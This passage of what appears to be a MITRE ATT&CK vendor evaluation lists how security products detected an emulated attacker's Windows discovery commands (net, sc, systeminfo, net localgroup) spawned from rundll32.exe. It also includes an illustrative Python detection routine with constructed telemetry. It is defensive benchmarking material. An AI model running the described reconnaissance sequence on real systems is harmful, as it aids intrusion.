Telemetry showed cmd.exe executing sc.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing sc.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7]
Carbon Black
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (System Service Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment (Tainted)
The capability enriched cmd.exe executing net.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing net.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation, so it is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Start Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that net was one of the commands used to enumerate current running services. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing net) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running net) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Service Discovery) and a suspicious indicator that a Windows service was manipulated via the sc.exe/net.exe tool. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe executing net.exe with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
RSA
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7]
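The three detection behaviours that recur in the vendor entries above (enriching a discovery command with its ATT&CK technique, marking it tainted because an ancestor such as rundll32.exe already carries an alert, and the delayed Enumeration Command Sequence alert that fires once several discovery techniques occur within a time window under the same lineage) as one added illustrative example in Python. It is not any vendor's code; the event stream, the prior alert on pid 100, the thresholds, and the echo -> T1033 mapping are constructed assumptions of the example.

```python
"""Added illustrative detection logic (not any vendor's code): enrich discovery
commands with ATT&CK techniques, propagate taint from an earlier alert down the
process tree, and raise one delayed Enumeration Command Sequence alert."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Discovery utilities seen in the evaluation and the technique each is enriched
# with. The echo -> T1033 mapping is this example's assumption.
DISCOVERY = {
    "ipconfig.exe": ("T1016", "System Network Configuration Discovery"),
    "arp.exe": ("T1016", "System Network Configuration Discovery"),
    "tasklist.exe": ("T1057", "Process Discovery"),
    "sc.exe": ("T1007", "System Service Discovery"),
    "net.exe": ("T1007", "System Service Discovery"),
    "systeminfo.exe": ("T1082", "System Information Discovery"),
}
ECHO_TECHNIQUE = ("T1033", "System Owner/User Discovery")

@dataclass(frozen=True)
class ProcessEvent:
    ts: float      # seconds since start of capture
    pid: int
    ppid: int
    image: str     # full image path
    cmdline: str

@dataclass(frozen=True)
class Alert:
    ts: float
    pid: int
    category: str              # "Enrichment" or "General Behavior"
    technique: Optional[str]   # ATT&CK ID for enrichments
    message: str
    tainted_by: Optional[str]  # name of the ancestor alert, if any

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Map a process event to a (technique id, name) pair, or None."""
    name = _basename(ev.image)
    if name in DISCOVERY:
        return DISCOVERY[name]
    if name == "cmd.exe":
        # echo is a cmd.exe builtin, so there is no child image to key on:
        # look at the first command after /c or /k instead.
        tokens = ev.cmdline.lower().split()
        for flag in ("/c", "/k"):
            if flag in tokens and tokens[tokens.index(flag) + 1:][:1] == ["echo"]:
                return ECHO_TECHNIQUE
    return None

def analyze(events, root_alerts, min_techniques=3, window=300.0):
    """root_alerts maps already-alerted pids to the alert name; returns alerts in time order."""
    parent = {e.pid: e.ppid for e in events}
    def taint_source(pid):
        # The nearest alerted ancestor (or the process itself) taints the event.
        while pid in parent:
            if pid in root_alerts:
                return root_alerts[pid]
            pid = parent[pid]
        return None
    def lineage_root(pid):
        # Top-most ancestor present in the capture (rundll32.exe in Step 2).
        while parent.get(pid) in parent:
            pid = parent[pid]
        return pid
    alerts, fired = [], set()
    seen = defaultdict(list)   # lineage root -> [(ts, technique id)]
    for ev in sorted(events, key=lambda e: e.ts):
        tech = classify(ev)
        if tech is None:
            continue
        taint = taint_source(ev.pid)
        alerts.append(Alert(ev.ts, ev.pid, "Enrichment", tech[0],
                            f"{_basename(ev.image)}: {tech[0]} {tech[1]}", taint))
        root = lineage_root(ev.pid)
        seen[root].append((ev.ts, tech[0]))
        recent = {t for ts, t in seen[root] if ev.ts - ts <= window}
        if len(recent) >= min_techniques and root not in fired:
            fired.add(root)   # delayed: fires once, on the Nth distinct technique
            alerts.append(Alert(ev.ts, ev.pid, "General Behavior", None,
                f"Enumeration Command Sequence: {len(recent)} techniques under pid {root} in {window:.0f}s", taint))
    return alerts

# Constructed sample telemetry: rundll32.exe (already alerted on) spawning
# cmd.exe children that run discovery commands, plus a benign ipconfig from
# explorer.exe so taint and lineage can be contrasted.
SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    ProcessEvent(0.0, 100, 50, SYS32 + r"\rundll32.exe", "rundll32.exe"),
    ProcessEvent(10.0, 101, 100, SYS32 + r"\cmd.exe", "cmd.exe /c ipconfig /all"),
    ProcessEvent(10.1, 102, 101, SYS32 + r"\ipconfig.exe", "ipconfig /all"),
    ProcessEvent(20.0, 103, 100, SYS32 + r"\cmd.exe", "cmd.exe /c arp -a"),
    ProcessEvent(20.1, 104, 103, SYS32 + r"\arp.exe", "arp -a"),
    ProcessEvent(30.0, 105, 100, SYS32 + r"\cmd.exe", "cmd.exe /c echo %USERNAME%"),
    ProcessEvent(40.0, 106, 100, SYS32 + r"\cmd.exe", "cmd.exe /c tasklist /v"),
    ProcessEvent(40.1, 107, 106, SYS32 + r"\tasklist.exe", "tasklist /v"),
    ProcessEvent(50.0, 200, 10, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(55.0, 201, 200, SYS32 + r"\ipconfig.exe", "ipconfig"),
]
SAMPLE_ROOT_ALERTS = {100: "Malicious File Detection"}  # constructed prior alert
```

Running `analyze(SAMPLE_EVENTS, SAMPLE_ROOT_ALERTS)` yields four tainted enrichments under rundll32.exe, one untainted enrichment for the explorer.exe lineage, and a single sequence alert on the tasklist.exe event (the third distinct technique), which is why the repeated arp/ipconfig T1016 hits alone do not trigger it.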
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing systeminfo.exe. [1] [2] [3] [4]
Enrichment
The capability enriched systeminfo.exe with the correct ATT&CK Technique (System Information Discovery). [1] [2] [3] [4]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing systeminfo. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran systeminfo) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because systeminfo was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert indicating systeminfo execution was suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Enrichment (Tainted)
The capability enriched systeminfo.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4]
Telemetry
Telemetry showed cmd.exe executing systeminfo with command-line arguments. [1] [2] [3] [4]
Endgame
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation, so it is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing systeminfo.exe (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified systeminfo as a reconnaissance command used to obtain details from the system. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched systeminfo.exe with an alert for Systeminfo Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1082 - System Information Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running systeminfo) was tagged for monitoring because its parent process had a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched systeminfo.exe indicating it could be used for reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing systeminfo.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. [1] [2]
McAfee
Enrichment
The capability enriched systeminfo.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery) and a suspicious indicator that system configuration info was queried. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed cmd.exe executing systeminfo.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. Though not visible in the image, MITRE confirmed that the relevant command was visible within the trace detection's process tree. [1] [2] [3] [4]
Microsoft
Telemetry
Telemetry showed the execution sequence of cmd.exe running systeminfo.exe. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Enrichment (Tainted)
The capability enriched the execution of systeminfo.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched cmd.exe executing systeminfo with the correct ATT&CK Technique (System Information Discovery). [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed cmd.exe executing systeminfo with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7]
RSA
Telemetry
Telemetry showed cmd.exe executing systeminfo.exe. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (System Information Discovery). [1] [2] [3] [4]
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net config was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4]
Enrichment (Tainted)
The capability enriched net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4]
Endgame
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing net.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7]
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation, so it is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Config Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1082 - System Information Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net config as a reconnaissance command performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
F-Secure
Enrichment
The capability enriched net.exe indicating it is commonly used for reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing net), which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running net) was tagged for monitoring because its parent process had a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8]
GoSecure
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the parent Script File Created alert. [1] [2]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4]
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Information Discovery) and a suspicious indicator that system configuration info was queried. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe). [1] [2] [3] [4] [5] [6] [7]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7]
Enrichment (Tainted)
The capability enriched the execution of net.exe as the execution of an enumeration command. The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched cmd.exe executing net with the correct ATT&CK Technique (System Information Discovery). [1] [2] [3] [4] [5] [6] [7]
RSA
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (Permission Groups Discovery) as well as the tag Administrator Enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because net localgroup was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert indicating net localgroup execution was suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Cybereason
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment (Tainted)
The capability enriched net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Endgame
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation, so it is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing net.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
The capability enriched net.exe with an alert for Enumeration of Administrator Account (tainted by a parent Malicious File Detection). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker enumerated members of the local administrators group. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running net) was tagged for monitoring because its parent process had a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment
The capability enriched net.exe indicating it is commonly used for reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing net), which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with the conditions Net Group Reconnaissance Command and Net LocalGroup Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The conditions contributing to Enrichment were added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See the Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and a suspicious indicator that information of users/groups was obtained. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Enrichment
The capability enriched net.exe executing with the correct ATT&CK Technique (Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
RSA
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (Permission Groups Discovery) as well as the tag Administrator Enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net localgroup was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Cybereason
Enrichment (Tainted)
The capability enriched net.exe executing with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Endgame
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by a parent Malicious File Detection). This alert was configured after the start of the evaluation, so it is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing net.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
The capability enriched net.exe with an alert for Enumeration of Administrator Account (tainted by a parent Malicious File Detection). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker enumerated members of the local administrators group. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing net), which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running net) was tagged for monitoring because its parent process had a detection (cmd.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment
The capability enriched net.exe indicating it is commonly used for reconnaissance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with the conditions Net Group Reconnaissance Command and Net LocalGroup Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The conditions contributing to Enrichment were added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See the Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and a suspicious indicator that information of users/groups was obtained. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Enrichment
The capability enriched net.exe executing with the correct ATT&CK Technique (Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
RSA
Telemetry
Telemetry showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (Permission Groups Discovery) as well as the tag Administrator Enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
CrowdStrike
Telemetry (Tainted)
Telemetry showed cmd.exe executing net with command-line arguments. The process tree view showed that all child cmd.exe processes under the parent rundll32.exe (including the one that ran net) were considered tainted. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
The capability showed cmd.exe executing net.exe with command-line arguments and enriched the command with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The enrichment was tainted by a previous detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net group was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Cybereason
Telemetry
Telemetry showed cmd.exe executing net with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
General Behavior (Tainted)
